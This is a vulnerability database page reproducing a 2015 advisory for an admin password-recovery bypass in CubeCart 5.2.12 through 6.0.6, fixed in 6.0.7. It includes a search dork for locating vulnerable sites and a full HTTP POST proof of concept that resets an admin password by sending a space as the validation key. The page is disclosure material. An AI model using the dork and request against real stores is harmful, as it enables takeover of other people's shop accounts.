Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

CubeCart 6.0.6 Administrative Bypass

🗓️ 12 Sep 2015 00:00:00Reported by Fernando CamaraType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

CubeCart 6.0.6 Admin Bypass via Recovery Pag

Code
`Application: CubeCart 6.0.6 > 5.2.12  
Fixed: 07/09/2015 (6.0.7)  
Credits: Fernando Câmara @overflowy  
Title: Admin account hijacking vulnerability  
Dork: inurl:"index.php?_a="  
Requirements: Default admin recovery functions enabled...  
Knowledge of the admin account email  
  
  
P.O.C  
  
Its possible for an attacker to access the admin pass recovery page without  
sending a recovery email previously.  
  
admin.php?_g=recovery  
  
The form asks us for a Validation Key , an Email and the new password.  
If a forgot password validation email is sent then the program saves the  
random generated key on the database  
on the admin user row.  
on the table CubeCart_admin_users  
  
Field: verify  
Type: varchar(32)  
Null: YES  
Default: NULL  
  
If a forgot password verification email is not sent then the default  
validation key according to the specified configuration of the field is  
NULL.  
If we input a space character (%20) the select query built in the function  
line 540 database.class.php will return results if the email is correct.  
  
The function at line 766 file database.class.php where() calls sqlSafe()  
declared in line 162 file mysql.class.php will quote our space character  
effectivly building a query with an empty string like this.  
  
SELECT admin_id,username WHERE email='[email protected]' AND verify = ' '; ->  
an empty string  
  
The database recognizes the empty string as null.  
  
  
  
Just a simple request that would change an admin account password and  
redirect the attacker right to the control panel.  
  
  
POST /admin.php?_g=recovery HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:38.0) Gecko/20100101  
Firefox/38.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://127.0.0.1/admin.php?_g=recovery  
Cookie: PHPSESSID=lqc12qi1i5o5sl0jtbqt5747k7  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
  
Content-Length: 154  
validate=%20&email=admin%40email.com  
&password%5Bnew%5D=newpass&password%5Bconfirm%5D=newpass&login=Submit&token=62a83c672e2763529b46fd8978ac9451  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Sep 2015 00:00Current
0.3Low risk
Vulners AI Score0.3
cubecart 6.0.6administrative bypassvulnerabilityrecovery pageadmin account hijackingsecurity exploitphpsessid
19